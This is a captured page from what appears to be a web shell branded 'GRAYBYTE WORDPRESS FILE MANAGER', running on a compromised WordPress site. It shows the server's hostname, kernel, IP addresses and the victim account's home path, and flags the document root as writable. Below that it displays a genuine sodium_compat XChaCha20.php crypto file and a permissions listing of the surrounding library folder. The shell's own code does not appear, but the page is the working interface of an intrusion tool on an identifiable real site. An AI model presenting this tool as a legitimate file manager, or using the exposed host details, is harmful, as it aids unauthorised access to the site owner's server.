✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.105
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/tdhomesa/tdtravelandlogistics.com/wp-includes/sodium_compat/src/Core//XChaCha20.php
<?php

if (class_exists('ParagonIE_Sodium_Core_XChaCha20', false)) {
    return;
}

/**
 * Class ParagonIE_Sodium_Core_XChaCha20
 */
class ParagonIE_Sodium_Core_XChaCha20 extends ParagonIE_Sodium_Core_HChaCha20
{
    /**
     * @internal You should not use this directly from another application
     *
     * @param int $len
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function stream($len, $nonce, $key)
    {
        if (self::strlen($nonce) !== 24) {
            throw new SodiumException('Nonce must be 24 bytes long');
        }
        return self::encryptBytes(
            new ParagonIE_Sodium_Core_ChaCha20_Ctx(
                self::hChaCha20(
                    self::substr($nonce, 0, 16),
                    $key
                ),
                self::substr($nonce, 16, 8)
            ),
            str_repeat("\x00", $len)
        );
    }

    /**
     * @internal You should not use this directly from another application
     *
     * @param int $len
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function ietfStream($len, $nonce, $key)
    {
        if (self::strlen($nonce) !== 24) {
            throw new SodiumException('Nonce must be 24 bytes long');
        }
        return self::encryptBytes(
            new ParagonIE_Sodium_Core_ChaCha20_IetfCtx(
                self::hChaCha20(
                    self::substr($nonce, 0, 16),
                    $key
                ),
                "\x00\x00\x00\x00" . self::substr($nonce, 16, 8)
            ),
            str_repeat("\x00", $len)
        );
    }

    /**
     * @internal You should not use this directly from another application
     *
     * @param string $message
     * @param string $nonce
     * @param string $key
     * @param string $ic
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function streamXorIc($message, $nonce, $key, $ic = '')
    {
        if (self::strlen($nonce) !== 24) {
            throw new SodiumException('Nonce must be 24 bytes long');
        }
        return self::encryptBytes(
            new ParagonIE_Sodium_Core_ChaCha20_Ctx(
                self::hChaCha20(self::substr($nonce, 0, 16), $key),
                self::substr($nonce, 16, 8),
                $ic
            ),
            $message
        );
    }

    /**
     * @internal You should not use this directly from another application
     *
     * @param string $message
     * @param string $nonce
     * @param string $key
     * @param string $ic
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function ietfStreamXorIc($message, $nonce, $key, $ic = '')
    {
        if (self::strlen($nonce) !== 24) {
            throw new SodiumException('Nonce must be 24 bytes long');
        }
        return self::encryptBytes(
            new ParagonIE_Sodium_Core_ChaCha20_IetfCtx(
                self::hChaCha20(self::substr($nonce, 0, 16), $key),
                "\x00\x00\x00\x00" . self::substr($nonce, 16, 8),
                $ic
            ),
            $message
        );
    }
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
22 Jun 2026 6.38 AM
tdhomesa / tdhomesa
0755
AEGIS
--
14 Nov 2024 9.17 AM
tdhomesa / tdhomesa
0755
AES
--
14 Nov 2024 9.17 AM
tdhomesa / tdhomesa
0755
Base64
--
14 Nov 2024 9.17 AM
tdhomesa / tdhomesa
0755
ChaCha20
--
1 Jul 2023 2.19 PM
tdhomesa / tdhomesa
0755
Curve25519
--
1 Jul 2023 2.19 PM
tdhomesa / tdhomesa
0755
Poly1305
--
1 Jul 2023 2.20 PM
tdhomesa / tdhomesa
0755
SecretStream
--
20 Mar 2023 9.11 PM
tdhomesa / tdhomesa
0755
AEGIS128L.php
3.582 KB
14 Nov 2024 9.17 AM
tdhomesa / tdhomesa
0644
AEGIS256.php
3.514 KB
14 Nov 2024 9.17 AM
tdhomesa / tdhomesa
0644
AES.php
15.513 KB
14 Nov 2024 9.17 AM
tdhomesa / tdhomesa
0644
BLAKE2b.php
23.625 KB
24 Mar 2022 7.50 PM
tdhomesa / tdhomesa
0644
ChaCha20.php
12.587 KB
3 Dec 2025 8.26 PM
tdhomesa / tdhomesa
0644
Curve25519.php
140.274 KB
3 Dec 2025 8.26 PM
tdhomesa / tdhomesa
0644
Ed25519.php
18.049 KB
3 Feb 2026 9.14 PM
tdhomesa / tdhomesa
0644
HChaCha20.php
4.043 KB
3 Dec 2025 8.26 PM
tdhomesa / tdhomesa
0644
HSalsa20.php
3.587 KB
21 Mar 2019 9.26 AM
tdhomesa / tdhomesa
0644
Poly1305.php
1.539 KB
3 Dec 2025 8.26 PM
tdhomesa / tdhomesa
0644
Ristretto255.php
21.371 KB
25 May 2021 6.25 PM
tdhomesa / tdhomesa
0644
Salsa20.php
8.04 KB
21 Mar 2019 9.26 AM
tdhomesa / tdhomesa
0644
SipHash.php
8.04 KB
25 May 2021 6.25 PM
tdhomesa / tdhomesa
0644
Util.php
28.227 KB
3 Dec 2025 8.26 PM
tdhomesa / tdhomesa
0644
X25519.php
8.216 KB
3 Dec 2025 8.26 PM
tdhomesa / tdhomesa
0644
XChaCha20.php
3.242 KB
3 Dec 2025 8.26 PM
tdhomesa / tdhomesa
0644
XSalsa20.php
1.339 KB
21 Mar 2019 9.26 AM
tdhomesa / tdhomesa
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF